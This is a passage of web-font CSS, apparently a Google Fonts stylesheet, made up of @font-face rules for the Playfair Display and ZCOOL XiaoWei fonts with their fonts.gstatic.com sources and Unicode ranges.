swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.5.woff2) format(\'woff2\');unicode-range: U+fee3, U+fef3, U+ff03-ff04, U+ff07, U+ff0a, U+ff17-ff19, U+ff1c-ff1d, U+ff20-ff3a, U+ff3c, U+ff3e-ff5b, U+ff5d, U+ff61-ff65, U+ff67-ff6a, U+ff6c, U+ff6f-ff78, U+ff7a-ff7d, U+ff80-ff84, U+ff86, U+ff89-ff8e, U+ff92, U+ff97-ff9b, U+ff9d-ff9f, U+ffe0-ffe4, U+ffe6, U+ffe9, U+ffeb, U+ffed, U+fffc, U+1f004, U+1f170-1f171, U+1f192-1f195, U+1f198-1f19a, U+1f1e6-1f1e8;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.6.woff2) format(\'woff2\');unicode-range: U+f0a7, U+f0b2, U+f0b7, U+f0c9, U+f0d8, U+f0da, U+f0dc-f0dd, U+f0e0, U+f0e6, U+f0eb, U+f0fc, U+f101, U+f104-f105, U+f107, U+f10b, U+f11b, U+f14b, U+f18a, U+f193, U+f1d6-f1d7, U+f244, U+f27a, U+f296, U+f2ae, U+f471, U+f4b3, U+f610-f611, U+f880-f881, U+f8ec, U+f8f5, U+f8ff, U+f901, U+f90a, U+f92c-f92d, U+f934, U+f937, U+f941, U+f965, U+f967, U+f969, U+f96b, U+f96f, U+f974, U+f978-f979, U+f97e, U+f981, U+f98a, U+f98e, U+f997, U+f99c, U+f9b2, U+f9b5, U+f9ba, U+f9be, U+f9ca, U+f9d0-f9d1, U+f9dd, U+f9e0-f9e1, U+f9e4, U+f9f7, U+fa00-fa01, U+fa08, U+fa0a, U+fa11, U+fb01-fb02, U+fdfc, U+fe0e, U+fe30-fe31, U+fe33-fe44, U+fe49-fe52, U+fe54-fe57, U+fe59-fe66, U+fe68-fe6b, U+fe8e, U+fe92-fe93, U+feae, U+feb8, U+fecb-fecc, U+fee0;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.21.woff2) format(\'woff2\');unicode-range: U+9f83, U+9f85-9f8d, U+9f90-9f91, U+9f94-9f96, U+9f98, U+9f9b-9f9c, U+9f9e, U+9fa0, U+9fa2, U+9ff0-9fff, U+a001, U+a007, U+a025, U+a046-a047, U+a057, U+a072, U+a078-a079, U+a083, U+a085, U+a100, U+a118, U+a132, U+a134, U+a1f4, U+a242, U+a4a6, U+a4aa, U+a4b0-a4b1, U+a4b3, U+a9c1-a9c2, U+ac00-ac01, U+ac04, U+ac08, U+ac10-ac11, U+ac13-ac16, U+ac19, U+ac1c-ac1d, U+ac24, U+ac70-ac71, U+ac74, U+ac77-ac78, U+ac80-ac81, U+ac83, U+ac8c, U+ac90, U+ac9f-aca0, U+aca8-aca9, U+acac, U+acb0, U+acbd, U+acc1, U+acc4, U+ace0-ace1, U+ace4, U+ace8, U+acf3, U+acf5, U+acfc-acfd, U+ad00, U+ad0c, U+ad11, U+ad1c, U+ad34, U+ad50, U+ad64, U+ad6c, U+ad70, U+ad74, U+ad7f, U+ad81, U+ad8c, U+adc0, U+adc8, U+addc, U+ade0, U+adf8-adf9, U+adfc, U+ae00, U+ae08-ae09, U+ae0b, U+ae30, U+ae34, U+ae38, U+ae40, U+ae4a, U+ae4c, U+ae54, U+ae68, U+aebc, U+aed8, U+af2c-af2d;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.22.woff2) format(\'woff2\');unicode-range: U+9e30-9e33, U+9e35-9e3b, U+9e3e, U+9e40-9e44, U+9e46-9e4e, U+9e51, U+9e53, U+9e55-9e58, U+9e5a-9e5c, U+9e5e-9e63, U+9e66-9e6e, U+9e71, U+9e73, U+9e75, U+9e78-9e79, U+9e7c-9e7e, U+9e82, U+9e86-9e88, U+9e8b-9e8c, U+9e90-9e91, U+9e93, U+9e95, U+9e97, U+9e9d, U+9ea4-9ea5, U+9ea9-9eaa, U+9eb4-9eb5, U+9eb8-9eba, U+9ebc-9ebf, U+9ec3, U+9ec9, U+9ecd, U+9ed0, U+9ed2-9ed3, U+9ed5-9ed6, U+9ed9, U+9edc-9edd, U+9edf-9ee0, U+9ee2, U+9ee5, U+9ee7-9eea, U+9eef, U+9ef1, U+9ef3-9ef4, U+9ef6, U+9ef9, U+9efb-9efc, U+9efe, U+9f0b, U+9f0d, U+9f10, U+9f14, U+9f17, U+9f19, U+9f22, U+9f29, U+9f2c, U+9f2f, U+9f31, U+9f37, U+9f39, U+9f3d-9f3e, U+9f41, U+9f4a-9f4b, U+9f51-9f52, U+9f61-9f63, U+9f66-9f67, U+9f80-9f81;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.23.woff2) format(\'woff2\');unicode-range: U+9c82-9c83, U+9c85-9c8c, U+9c8e-9c92, U+9c94-9c9b, U+9c9e-9ca3, U+9ca5-9ca7, U+9ca9, U+9cab, U+9cad-9cae, U+9cb1-9cb7, U+9cb9-9cbd, U+9cbf-9cc0, U+9cc3, U+9cc5-9cc7, U+9cc9-9cd1, U+9cd3-9cda, U+9cdc-9cdd, U+9cdf, U+9ce1-9ce3, U+9ce5, U+9ce9, U+9cee-9cef, U+9cf3-9cf4, U+9cf6, U+9cfc-9cfd, U+9d02, U+9d08-9d09, U+9d12, U+9d1b, U+9d1e, U+9d26, U+9d28, U+9d37, U+9d3b, U+9d3f, U+9d51, U+9d59, U+9d5c-9d5d, U+9d5f-9d61, U+9d6c, U+9d70, U+9d72, U+9d7a, U+9d7e, U+9d84, U+9d89, U+9d8f, U+9d92, U+9daf, U+9db4, U+9db8, U+9dbc, U+9dc4, U+9dc7, U+9dc9, U+9dd7, U+9ddf, U+9df2, U+9df9-9dfa, U+9e0a, U+9e11, U+9e1a, U+9e1e, U+9e20, U+9e22, U+9e28-9e2c, U+9e2e-9e2f;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.24.woff2) format(\'woff2\');unicode-range: U+9a80, U+9a83, U+9a85, U+9a88-9a8a, U+9a8d-9a8e, U+9a90, U+9a92-9a93, U+9a95-9a96, U+9a98-9a99, U+9a9b-9aa2, U+9aa5, U+9aa7, U+9aaf-9ab1, U+9ab5-9ab6, U+9ab9-9aba, U+9ac0-9ac4, U+9ac8, U+9acb-9acc, U+9ace-9acf, U+9ad1-9ad2, U+9ad9, U+9adf, U+9ae1, U+9ae3, U+9aea-9aeb, U+9aed-9aef, U+9af4, U+9af9, U+9afb, U+9b03-9b04, U+9b06, U+9b08, U+9b0d, U+9b0f-9b10, U+9b13, U+9b18, U+9b1a, U+9b1f, U+9b22-9b23, U+9b25, U+9b27-9b28, U+9b2a, U+9b2f, U+9b31-9b32, U+9b3b, U+9b43, U+9b46-9b49, U+9b4d-9b4e, U+9b51, U+9b56, U+9b58, U+9b5a, U+9b5c, U+9b5f, U+9b61-9b62, U+9b6f, U+9b77, U+9b80, U+9b88, U+9b8b, U+9b8e, U+9b91, U+9b9f-9ba0, U+9ba8, U+9baa-9bab, U+9bad-9bae, U+9bb0-9bb1, U+9bb8, U+9bc9-9bca, U+9bd3, U+9bd6, U+9bdb, U+9be8, U+9bf0-9bf1, U+9c02, U+9c10, U+9c15, U+9c24, U+9c2d, U+9c32, U+9c39, U+9c3b, U+9c40, U+9c47-9c49, U+9c53, U+9c57, U+9c64, U+9c72, U+9c77-9c78, U+9c7b, U+9c7f-9c80;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.25.woff2) format(\'woff2\');unicode-range: U+98dd, U+98e1-98e2, U+98e7-98ea, U+98ec, U+98ee-98ef, U+98f2, U+98f4, U+98fc-98fe, U+9903, U+9905, U+9908, U+990a, U+990c-990d, U+9913-9914, U+9918, U+991a-991b, U+991e, U+9921, U+9928, U+992c, U+992e, U+9935, U+9938-9939, U+993d-993e, U+9945, U+994b-994c, U+9951-9952, U+9954-9955, U+9957, U+995e, U+9963, U+9966-9969, U+996b-996c, U+996f, U+9974-9975, U+9977-9979, U+997d-997e, U+9980-9981, U+9983-9984, U+9987, U+998a-998b, U+998d-9991, U+9993-9995, U+9997-9998, U+99a5, U+99ab, U+99ad-99ae, U+99b1, U+99b3-99b4, U+99bc, U+99bf, U+99c1, U+99c3-99c6, U+99cc, U+99d0, U+99d2, U+99d5, U+99db, U+99dd, U+99e1, U+99ed, U+99f1, U+99ff, U+9a01, U+9a03-9a04, U+9a0e-9a0f, U+9a11-9a13, U+9a19, U+9a1b, U+9a28, U+9a2b, U+9a30, U+9a32, U+9a37, U+9a40, U+9a45, U+9a4a, U+9a4d-9a4e, U+9a52, U+9a55, U+9a57, U+9a5a-9a5b, U+9a5f, U+9a62, U+9a65, U+9a69, U+9a6b, U+9a6e, U+9a75, U+9a77-9a7a, U+9a7d;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.26.woff2) format(\'woff2\');unicode-range: U+975b-975c, U+9763, U+9765-9766, U+976c-976d, U+9773, U+9776, U+977a, U+977c, U+9784-9785, U+978e-978f, U+9791-9792, U+9794-9795, U+9798, U+979a, U+979e, U+97a3, U+97a5-97a6, U+97a8, U+97ab-97ac, U+97ae-97af, U+97b2, U+97b4, U+97c6, U+97cb-97cc, U+97d3, U+97d8, U+97dc, U+97e1, U+97ea-97eb, U+97ee, U+97fb, U+97fe-97ff, U+9801-9803, U+9805-9806, U+9808, U+980c, U+9810-9814, U+9817-9818, U+981e, U+9820-9821, U+9824, U+9828, U+982b-982d, U+9830, U+9834, U+9838-9839, U+983c, U+9846, U+984d-984f, U+9851-9852, U+9854-9855, U+9857-9858, U+985a-985b, U+9862-9863, U+9865, U+9867, U+986b, U+986f-9871, U+9877-9878, U+987c, U+9880, U+9883, U+9885, U+9889, U+988b-988f, U+9893-9895, U+9899-989b, U+989e-989f, U+98a1-98a2, U+98a5-98a7, U+98a9, U+98af, U+98b1, U+98b6, U+98ba, U+98be, U+98c3-98c4, U+98c6-98c8, U+98cf-98d6, U+98da-98db;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.27.woff2) format(\'woff2\');unicode-range: U+95c4-95ca, U+95cc-95cd, U+95d4-95d6, U+95d8, U+95e1-95e2, U+95e9, U+95f0-95f1, U+95f3, U+95f6, U+95fc, U+95fe-95ff, U+9602-9604, U+9606-960d, U+960f, U+9611-9613, U+9615-9617, U+9619-961b, U+961d, U+9621, U+9628, U+962f, U+963c-963e, U+9641-9642, U+9649, U+9654, U+965b-965f, U+9661, U+9663, U+9665, U+9667-9668, U+966c, U+9670, U+9672-9674, U+9678, U+967a, U+967d, U+9682, U+9685, U+9688, U+968a, U+968d-968e, U+9695, U+9697-9698, U+969e, U+96a0, U+96a3-96a4, U+96a8, U+96aa, U+96b0-96b1, U+96b3-96b4, U+96b7-96b9, U+96bb-96bd, U+96c9, U+96cb, U+96ce, U+96d1-96d2, U+96d6, U+96d9, U+96db-96dc, U+96de, U+96e0, U+96e3, U+96e9, U+96eb, U+96f0-96f2, U+96f9, U+96ff, U+9701-9702, U+9705, U+9708, U+970a, U+970e-970f, U+9711, U+9719, U+9727, U+972a, U+972d, U+9730, U+973d, U+9742, U+9744, U+9748-9749, U+9750-9751, U+975a;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.28.woff2) format(\'woff2\');unicode-range: U+94f5, U+94f7, U+94f9, U+94fb-94fd, U+94ff, U+9503-9504, U+9506-9507, U+9509-950a, U+950d-950f, U+9511-9518, U+951a-9520, U+9522, U+9528-952d, U+9530-953a, U+953c-953f, U+9543-9546, U+9548-9550, U+9552-9555, U+9557-955b, U+955d-9568, U+956a-956d, U+9570-9574, U+9583, U+9586, U+9589, U+958e-958f, U+9591-9592, U+9594, U+9598-9599, U+959e-95a0, U+95a2-95a6, U+95a8-95b2, U+95b4, U+95b8-95c3;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.29.woff2) format(\'woff2\');unicode-range: U+941c-942b, U+942d-942e, U+9432-9433, U+9435, U+9438, U+943a, U+943e, U+9444, U+944a, U+9451-9452, U+945a, U+9462-9463, U+9465, U+9470-9487, U+948a-9492, U+9494-9498, U+949a, U+949c-949d, U+94a1, U+94a3-94a4, U+94a8, U+94aa-94ad, U+94af, U+94b2, U+94b4-94ba, U+94bc-94c0, U+94c4, U+94c6-94db, U+94de-94ec, U+94ee-94f1, U+94f3;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.30.woff2) format(\'woff2\');unicode-range: U+92ec-92ed, U+92f0, U+92f3, U+92f8, U+92fc, U+9304, U+9306, U+9310, U+9312, U+9315, U+9318, U+931a, U+931e, U+9320-9322, U+9324, U+9326-9329, U+932b-932c, U+932f, U+9331-9332, U+9335-9336, U+933e, U+9340-9341, U+934a-9360, U+9362-9363, U+9365-936b, U+936e, U+9375, U+937e, U+9382, U+938a, U+938c, U+938f, U+9393-9394, U+9396-9397, U+939a, U+93a2, U+93a7, U+93ac-93cd, U+93d0-93d1, U+93d6-93d8, U+93de-93df, U+93e1-93e2, U+93e4, U+93f8, U+93fb, U+93fd, U+940e-941a;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.31.woff2) format(\'woff2\');unicode-range: U+9163-9164, U+9169, U+9170, U+9172, U+9174, U+9179-917a, U+917d-917e, U+9182-9183, U+9185, U+918c-918d, U+9190-9191, U+919a, U+919c, U+91a1-91a4, U+91a8, U+91aa-91af, U+91b4-91b5, U+91b8, U+91ba, U+91be, U+91c0-91c1, U+91c6, U+91c8, U+91cb, U+91d0, U+91d2, U+91d7-91d8, U+91dd, U+91e3, U+91e6-91e7, U+91ed, U+91f0, U+91f5, U+91f9, U+9200, U+9205, U+9207-920a, U+920d-920e, U+9210, U+9214-9215, U+921c, U+921e, U+9221, U+9223-9227, U+9229-922a, U+922d, U+9234-9235, U+9237, U+9239-923a, U+923c-9240, U+9244-9246, U+9249, U+924e-924f, U+9251, U+9253, U+9257, U+925b, U+925e, U+9262, U+9264-9266, U+9268, U+926c, U+926f, U+9271, U+927b, U+927e, U+9280, U+9283, U+9285-928a, U+928e, U+9291, U+9293, U+9296, U+9298, U+929c-929d, U+92a8, U+92ab-92ae, U+92b3, U+92b6-92b7, U+92b9, U+92c1, U+92c5-92c6, U+92c8, U+92cc, U+92d0, U+92d2, U+92e4, U+92ea;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.32.woff2) format(\'woff2\');unicode-range: U+9004, U+900b, U+9011, U+9015-9016, U+901e, U+9021, U+9026, U+902d, U+902f, U+9031, U+9035-9036, U+9039-903a, U+9041, U+9044-9046, U+904a, U+904f-9052, U+9054-9055, U+9058-9059, U+905b-905e, U+9060-9062, U+9068-9069, U+906f, U+9072, U+9074, U+9076-907a, U+907c-907d, U+9081, U+9083, U+9085, U+9087-908b, U+908f, U+9095, U+9097, U+9099-909b, U+909d, U+90a0-90a1, U+90a8-90a9, U+90ac, U+90b0, U+90b2-90b4, U+90b6, U+90b8, U+90ba, U+90bd-90be, U+90c3-90c5, U+90c7-90c8, U+90cf-90d0, U+90d3, U+90d5, U+90d7, U+90da-90dc, U+90de, U+90e2, U+90e4, U+90e6-90e7, U+90ea-90eb, U+90ef, U+90f4-90f5, U+90f7, U+90fe-9100, U+9104, U+9109, U+910c, U+9112, U+9114-9115, U+9118, U+911c, U+911e, U+9120, U+9122-9123, U+9127, U+912d, U+912f-9132, U+9139-913a, U+9143, U+9146, U+9149-914a, U+914c, U+914e-9150, U+9154, U+9157, U+915a, U+915d-915e, U+9161-9162;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.33.woff2) format(\'woff2\');unicode-range: U+8e41-8e42, U+8e47, U+8e49-8e4b, U+8e50-8e53, U+8e59-8e5a, U+8e5f-8e60, U+8e64, U+8e69, U+8e6c, U+8e70, U+8e74, U+8e76, U+8e7a-8e7c, U+8e7f, U+8e84-8e85, U+8e87, U+8e89, U+8e8b, U+8e8d, U+8e8f-8e90, U+8e94, U+8e99, U+8e9c, U+8e9e, U+8eaa, U+8eac, U+8eb0, U+8eb6, U+8ec0, U+8ec6, U+8eca-8ece, U+8ed2, U+8eda, U+8edf, U+8ee2, U+8eeb, U+8ef8, U+8efb-8efe, U+8f03, U+8f09, U+8f0b, U+8f12-8f15, U+8f1b, U+8f1d, U+8f1f, U+8f29-8f2a, U+8f2f, U+8f36, U+8f38, U+8f3b, U+8f3e-8f3f, U+8f44-8f45, U+8f49, U+8f4d-8f4e, U+8f5f, U+8f6b, U+8f6d, U+8f71-8f73, U+8f75-8f76, U+8f78-8f7a, U+8f7c, U+8f7e, U+8f81-8f82, U+8f84, U+8f87, U+8f8a-8f8b, U+8f8d-8f8f, U+8f94-8f95, U+8f97-8f9a, U+8fa6, U+8fad-8faf, U+8fb2, U+8fb5-8fb7, U+8fba-8fbc, U+8fbf, U+8fc2, U+8fcb, U+8fcd, U+8fd3, U+8fd5, U+8fd7, U+8fda, U+8fe2-8fe5, U+8fe8-8fe9, U+8fee, U+8ff3-8ff4, U+8ff8, U+8ffa;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.34.woff2) format(\'woff2\');unicode-range: U+8cbd, U+8cbf-8cc4, U+8cc7-8cc8, U+8cca, U+8ccd, U+8cd1, U+8cd3, U+8cdb-8cdc, U+8cde, U+8ce0, U+8ce2-8ce4, U+8ce6-8ce8, U+8cea, U+8ced, U+8cf4, U+8cf8, U+8cfa, U+8cfc-8cfd, U+8d04-8d05, U+8d07-8d08, U+8d0a, U+8d0d, U+8d0f, U+8d13-8d14, U+8d16, U+8d1b, U+8d20, U+8d30, U+8d32-8d33, U+8d36, U+8d3b, U+8d3d, U+8d40, U+8d42-8d43, U+8d45-8d46, U+8d48-8d4a, U+8d4d, U+8d51, U+8d53, U+8d55, U+8d59, U+8d5c-8d5d, U+8d5f, U+8d61, U+8d66-8d67, U+8d6a, U+8d6d, U+8d71, U+8d73, U+8d84, U+8d90-8d91, U+8d94-8d95, U+8d99, U+8da8, U+8daf, U+8db1, U+8db5, U+8db8, U+8dba, U+8dbc, U+8dbf, U+8dc2, U+8dc4, U+8dc6, U+8dcb, U+8dce-8dcf, U+8dd6-8dd7, U+8dda-8ddb, U+8dde, U+8de1, U+8de3-8de4, U+8de9, U+8deb-8dec, U+8df0-8df1, U+8df6-8dfd, U+8e05, U+8e07, U+8e09-8e0a, U+8e0c, U+8e0e, U+8e10, U+8e14, U+8e1d-8e1f, U+8e23, U+8e26, U+8e2b-8e31, U+8e34-8e35, U+8e39-8e3a, U+8e3d, U+8e40;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.35.woff2) format(\'woff2\');unicode-range: U+8b80, U+8b83, U+8b8a, U+8b8c, U+8b90, U+8b93, U+8b99-8b9a, U+8ba0, U+8ba3, U+8ba5-8ba7, U+8baa-8bac, U+8bb4-8bb5, U+8bb7, U+8bb9, U+8bc2-8bc3, U+8bc5, U+8bcb-8bcc, U+8bce-8bd0, U+8bd2-8bd4, U+8bd6, U+8bd8-8bd9, U+8bdc, U+8bdf, U+8be3-8be4, U+8be7-8be9, U+8beb-8bec, U+8bee, U+8bf0, U+8bf2-8bf3, U+8bf6, U+8bf9, U+8bfc-8bfd, U+8bff-8c00, U+8c02, U+8c04, U+8c06-8c07, U+8c0c, U+8c0f, U+8c11-8c12, U+8c14-8c1b, U+8c1d-8c21, U+8c24-8c25, U+8c27, U+8c2a-8c2c, U+8c2e-8c30, U+8c32-8c36, U+8c3f, U+8c47-8c4c, U+8c4e-8c50, U+8c54-8c56, U+8c62, U+8c68, U+8c6c, U+8c73, U+8c78, U+8c7a, U+8c82, U+8c85, U+8c89-8c8a, U+8c8d-8c8e, U+8c90, U+8c93-8c94, U+8c98, U+8c9d-8c9e, U+8ca0-8ca2, U+8ca7-8cac, U+8caf-8cb0, U+8cb3-8cb4, U+8cb6-8cb9, U+8cbb-8cbc;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.36.woff2) format(\'woff2\');unicode-range: U+8a15-8a18, U+8a1a-8a1b, U+8a1d, U+8a1f, U+8a22-8a23, U+8a25, U+8a2b, U+8a2d, U+8a31, U+8a33-8a34, U+8a36-8a38, U+8a3a, U+8a3c, U+8a3e, U+8a40-8a41, U+8a46, U+8a48, U+8a50, U+8a52, U+8a54-8a55, U+8a58, U+8a5b, U+8a5d-8a63, U+8a66, U+8a69-8a6b, U+8a6d-8a6e, U+8a70, U+8a72-8a73, U+8a7a, U+8a85, U+8a87, U+8a8a, U+8a8c-8a8d, U+8a90-8a92, U+8a95, U+8a98, U+8aa0-8aa1, U+8aa3-8aa6, U+8aa8-8aa9, U+8aac-8aae, U+8ab0, U+8ab2, U+8ab8-8ab9, U+8abc, U+8abe-8abf, U+8ac7, U+8acf, U+8ad2, U+8ad6-8ad7, U+8adb-8adc, U+8adf, U+8ae1, U+8ae6-8ae8, U+8aeb, U+8aed-8aee, U+8af1, U+8af3-8af4, U+8af7-8af8, U+8afa, U+8afe, U+8b00-8b02, U+8b07, U+8b0a, U+8b0c, U+8b0e, U+8b10, U+8b17, U+8b19, U+8b1b, U+8b1d, U+8b20-8b21, U+8b26, U+8b28, U+8b2c, U+8b33, U+8b39, U+8b3e-8b3f, U+8b41, U+8b45, U+8b49, U+8b4c, U+8b4f, U+8b57-8b58, U+8b5a, U+8b5c, U+8b5e, U+8b60, U+8b6c, U+8b6f-8b70, U+8b72, U+8b74, U+8b77, U+8b7d;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.37.woff2) format(\'woff2\');unicode-range: U+8882, U+8884-8886, U+8888, U+888f, U+8892-8893, U+889b, U+88a2, U+88a4, U+88a6, U+88a8, U+88aa, U+88ae, U+88b1, U+88b4, U+88b7, U+88bc, U+88c0, U+88c6-88c9, U+88ce-88cf, U+88d1-88d3, U+88d8, U+88db-88dd, U+88df, U+88e1-88e3, U+88e5, U+88e8, U+88ec, U+88f0-88f1, U+88f3-88f4, U+88fc-88fe, U+8900, U+8902, U+8906-8907, U+8909-890c, U+8912-8915, U+8918-891b, U+8921, U+8925, U+892b, U+8930, U+8932, U+8934, U+8936, U+893b, U+893d, U+8941, U+894c, U+8955-8956, U+8959, U+895c, U+895e-8960, U+8966, U+896a, U+896c, U+896f-8970, U+8972, U+897b, U+897e, U+8980, U+8983, U+8985, U+8987-8988, U+898c, U+898f, U+8993, U+8997, U+899a, U+89a1, U+89a7, U+89a9-89aa, U+89b2-89b3, U+89b7, U+89c0, U+89c7, U+89ca-89cc, U+89ce-89d1, U+89d6, U+89da, U+89dc, U+89de, U+89e5, U+89e7, U+89eb, U+89ef, U+89f1, U+89f3-89f4, U+89f8, U+89ff, U+8a01-8a03, U+8a07-8a0a, U+8a0e-8a0f, U+8a13;}@font-face {font-family: \'ZCOOL XiaoWei\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/zcoolxiaowei/v15/i7dMIFFrTRywPpUVX9_RJyM1YFf4BQ6OHB3qE7y2ys6XIzxYv88CVLJlObJGMqmkzaJnjA.38.woff2) format(\'woff2\');unicode-range: U+86f4, U+86f8-86f9, U+86fb, U+86fe, U+8703, U+8706-870a, U+870d, U+8711-8713, U+871a, U+871e, U+8722-8723, U+8725, U+8729, U+872e, U+8731, U+8734, U+8737, U+873a-873b, U+873e-8740, U+8742, U+8747-8748, U+8753, U+8755, U+8757-8758, U+875d, U+875f, U+8762-8766, U+8768, U+876e, U+8770, U+8772, U+8775, U+8778, U+877b-877e, U+8782, U+8785, U+8788, U+878b, U+8793, U+8797, U+879a, U+879e-87a0, U+87a2-87a3, U+87a8, U+87ab-87ad, U+87af, U+87b3, U+87b5, U+87bd, U+87c0, U+87c4, U+87c6, U+87ca-87cb, U+87d1-87d2, 